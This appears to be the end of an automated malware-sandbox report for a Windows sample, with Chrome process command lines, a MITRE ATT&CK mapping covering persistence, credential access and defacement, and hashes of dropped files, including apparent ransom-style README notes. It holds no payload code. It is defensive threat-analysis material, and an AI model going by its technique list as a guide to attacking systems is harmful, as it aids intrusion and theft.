"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:32

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5180 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:3872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2676 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:4472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4876 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:2604

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1312

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
60fe01df86be2e5331b0cdbe86165686

SHA1
2a79f9713c3f192862ff80508062e64e8e0b29bd

SHA256
c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8

SHA512
ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
5c3dad2b6a431fe71d06239d80962771

SHA1
bdefa64729e7151f9e0f4dc7deaf6cbdcafb4ba6

SHA256
c736f23cd51444387496b4e685163e7cd9613137801a91f9ec3b0eba5b01d95f

SHA512
58bdeaa56e9a7625810c7b2409be369639999d7e47d45fb2d310800781b58b77f6cf521e6abf84a6b5646f9de0bd119055d5906100e4919b767e529373dbb892

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
216B

MD5
09bd0169e5145eb1c4a7d8c3637c2988

SHA1
5f13a93225d4256b6080243ac72828fe36131133

SHA256
de4671963cab59bfe7784affd89896cd13bc06288f38b5cedda90812277849b6

SHA512
c9da366caf4c941ac0a26eab39acbb56ca3e2d3c18508773430a22fd7319656797a5f32e663fa9568b04b3b0dbe3788e7572792c51af69c1b2a44f9a7b78e46b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
1KB

MD5
4428b4b23d976c8a31f89e91fbfa053e

SHA1
272885f061ed0202a0e339104e707ac6c3aa0827

SHA256
a51d334926166a4bc893a944ca7873f77a87eb767bba118554367e12ec641690

SHA512
d77f5bd7a39cece9d7b1fc701721e11ffca27e5936b29ba750e6ef062056af17df296b13360a3e21ece3c5e175d7f45ebde0413cf1f712a60b6ec8cec4b71b16

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
371B

MD5
ad78c493a3508ca41e21d4f2c8c18fc3

SHA1
b88b370171ae0b9cd77cb514ca29b7e76db6d720

SHA256
22e508504419bc2a8afc6b57b55a75bc2aa4df69ea98cd683ea3d92718066918

SHA512
0611ae9f0b2f26a033d7459136876e01c78849a87e490db3a21ddebf4969c6112c7fdc61d89db8245d94abab925bf56120d438f7c305722d361a1b90a548de1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
707B

MD5
9cb2e5b79117b780ee67253bffabe827

SHA1
3f2377dfddc515294157e4b52ad87244e25688e8

SHA256
220ca59d6c78304f7fb64c6f9874c930d10aed67c024d5894c6851d2e0e0813e

SHA512
14ebfe7258fe76f7e5d17ae6bb36b00c5d1ae17394b366fb111bb43089be3e716af1f6202e4eec2384750915f37784757a0382bc4bf8647632ee72e4c7393caf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
875B

MD5
0b10885cb9bfaf545346a2fbb0f3424b

SHA1
47ec8ed84a8959631732ce93151e037ad3bb1601

SHA256
e0510bf668fb7a49f9385170a110077c39ece8f1fa2aaea61b41c1e15caa893b

SHA512
ba2287fc9b6538b6395dc6678b3a8121b069182a8fb85779f3b56fcaf6e795474aeb4fd733c88610257a443f62c1d8a9e818df276995ddae7ce27d6da39f44d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
f15f4341cc9db1421137149d955a4f6c

SHA1
820b484ca53a3bdbefdee5f5cef9877146e11ac4

SHA256
50a71e280876c1daaa4a5cc96aa774e560b13247aaa6f6276abd8e467fa3224e

SHA512
745ade36206b8a94bb44eaed0fc019396ca0b5843c4f8f2199916253b26a4de74594ef9a40531b4897558a5be40c08fabbef04840f52eae69373cf8101280d72

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
0d84326774125446f7607db53f067d91

SHA1
6a2ca0b1910e49ff9ac2d8d8668155ff9c3fbfba

SHA256
7208e18910d2c28f26f6edb5583c7ab9b093b7ffc4928cf3838e28b1d46b718b

SHA512
70be645df01fbf40e3b8238729da00e0512dd7f692fa3523495210210eb7f10e0321c181233acc7801794d241ce1a592120f702ff6aa697d50b7a2a72a20c141

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
4f8e4d217289e8b923015c03fd404358

SHA1
3c2ec730a5f51ef446ad018043cb2c3686fd7aee

SHA256
42d15436fdd5ee8ee69f2395f9f5120afd1063757fc41f95541d07ba149a52a2

SHA512
45f78be94acfe804409a445edb53d888830a831c4cbfe9e56085632dc789a0637e1be9dde325cc2a71126c3d951726942cf26af66b8f0e57eed6484ad7aa81d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
a14a8991ae21a5f52fba722f34ee049e

SHA1
be8e2bd320abd59b74de9bc375e55646ce31b00e

SHA256
fc0e5d7d337d1e3904511401cdf0fc2a9b8e9ec30038f762dbf733c1315793c6

SHA512
ec146a3dff7411dae9e6081d13c4c7d8c71f6e5966bce1d20d92b57632010a6e972b8a76d879318fff415e8f6a95df77a855dc501ebf89a7e336b43f51e1881d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
12KB

MD5
6241ead879b392d0d9495804b2f736b9

SHA1
7ef034eb9b2a0f117f86a8e97063ae3f2cdc4bde

SHA256
10939a36d8c527e7660be489ab38676782e13450ae3fa54fde91d096b716a181

SHA512
5f30f4f29ee7d19c49e803f97849869785a178bb80689817315d41c238562356c6192dd1948f5968c4aced4596c18cf84926a716894fddcf877180ef5e261897

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1
Filesize
264KB

MD5
2b3596ab26cd3fb488d7cc0cd8818e3c

SHA1
0962f3ce598f3634966de711f6a2e7142738c6ef

SHA256
0a6c451ab508003bd610130d0a65f5950d5f19938515e68a59e6342071082342

SHA512
642c8e6e2645ed2e80a3e20ce7fefee3f079d7dd1e89bcba2e4a21db45c7d923c38801547e1c2fd1ba6e5a2e251e465d809c15149b5f5ca0d7663f62cf3dcea8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
3e10aeb635ca587ccf0df04729c8e851

SHA1
db149ae9c03171aff6681a7266bf3e8e85178274

SHA256
b22973897cfac53debed7b90f7cf3b89b2d44279a016412bab5b1b6ff831d050

SHA512
8e09afc0adae2133ee5fe38d89ffa5eb64c350f123f3852df27b5870043f48ae2fd69c115e9e42c34dd1c06c517f38e870bdb9499a8341dd1557832d2b01e620

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
4b7477b44948c79a218069723d6186ec

SHA1
5b381cc76951321fc1c698ee4a59890115bcd593

SHA256
3c65ee667b56701678811ba1ee880076fa739a75c0a9ebee7aef1b87f4b2be21

SHA512
ec8447965bd1a90342e06476d137d276ebe16f1b37ccdb865ea86e86be1661d1cc6efcdc27bcd4fdea3108c25012ae724e48236ede6f818e24136c00f6115974

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
33f8a9482ff5ac727f55d88d5d819e4f

SHA1
2ddd8613aee19da26f2c819a279e0154da9f3b96

SHA256
ebd28489b7f2285aac692fb76845e4a0299a4e82e1ce22836a7a20c910db1c17

SHA512
80b893d3e1d8e401a1a485eca121c21bc7f103d3c5464911982ff8dcb2ac253e8e0a60c9b0ba284ee53d2c18e1f96f27092761b5c8aabf093d80495d3910f0fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
0c8988faedf6b7ee2d5a6f5e7de88f19

SHA1
685ca4ff9d73186aa6da01612e882e93b9793fd4

SHA256
005050d0363117b782511222154a59cc536366592734cfcbee4bc76941303561

SHA512
f89f6c20026447540fad669bb2b55308ed8a11abd65f37fd9879a0a73eb389dea8cf61c93b1bcd4d02b364852a61e5d55a9a42385ef3e67c22e3075f7f8fe7f4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
98KB

MD5
871c0c459405518416922f5daf980541

SHA1
848e9e68182268ce35215b4189916e56ff443c0e

SHA256
a8ae1bb4200713f8587eb8efb329d625b94fa30433d5e992ef6efc1733ace010

SHA512
1ea0a37720e9af6ee3baebab8828f2fe8b80f0fa0420a51ef140529524e44642e3ec87d6cff18e6d80f09a02b74e7b96d8b86fa70b8cbc713d96a24472a0754a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
105KB

MD5
4a056f159dabb7b05424005af97f2bae

SHA1
ac5165dceeabe5a89058efb743b8e67af9f83240

SHA256
289cab2344cfc86a9c3d9f0dee1e8056e9856020fd95f09550a58a2d9e70c4c1

SHA512
37c30ca8375274af559cc3738baa9cf9d236f7198cf5b18152ca7e133e088cdd570863c1baa06731e77b4a7cfd8a099b264a0b83d289521ac61f653446b29d79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe588c5d.TMP
Filesize
93KB

MD5
1614fb94616dfc03d70afee7c743376e

SHA1
ec1ef96cfa8424e5486be4dafcb5f208f61830d5

SHA256
80b945fe826e850832b01cff1ed542afb890856f15dcfd9ddca0984119b542d5

SHA512
8763dd94bb80342c2391bf7e13f3bed698fd5edad968dba3baf5d4098092b4e216ac5df46a3fd4c8e717c75b09863bbf9db2b95b7f8af3b2374bb4183afce2ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7351f8e11966361491153ff50c4264d2

SHA1
86314fd184e77cf04230225b056ba83cd7234b27

SHA256
b1b484f05502a6beeaacd0461977f1d6be9b8906b7e70ade8db4a1392558d9c0

SHA512
0c7174a37da6807b5d073e400f7ceb560c85e5b14cee5eef5fbc3717cee9c0c6cb09b126fe907a1bb161e007533174eda9fb55f9e879bb37942fd5a4fd330ed5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hiiyxvxr.jrk.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Desktop\README.99c97067.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
C:\Users\README.99c97067.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
\??\pipe\crashpad_456_IJLPLMEVFPNZWYNM
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4472-130-0x0000013B297D0000-0x0000013B297E0000-memory.dmp

Filesize
64KB

Download
memory/4472-153-0x0000013B297D0000-0x0000013B297E0000-memory.dmp

Filesize
64KB

Download
memory/4472-134-0x0000013B29CC0000-0x0000013B29D36000-memory.dmp

Filesize
472KB

Download
memory/4472-131-0x0000013B297D0000-0x0000013B297E0000-memory.dmp

Filesize
64KB

Download
memory/4472-129-0x0000013B29790000-0x0000013B297B2000-memory.dmp

Filesize
136KB

Download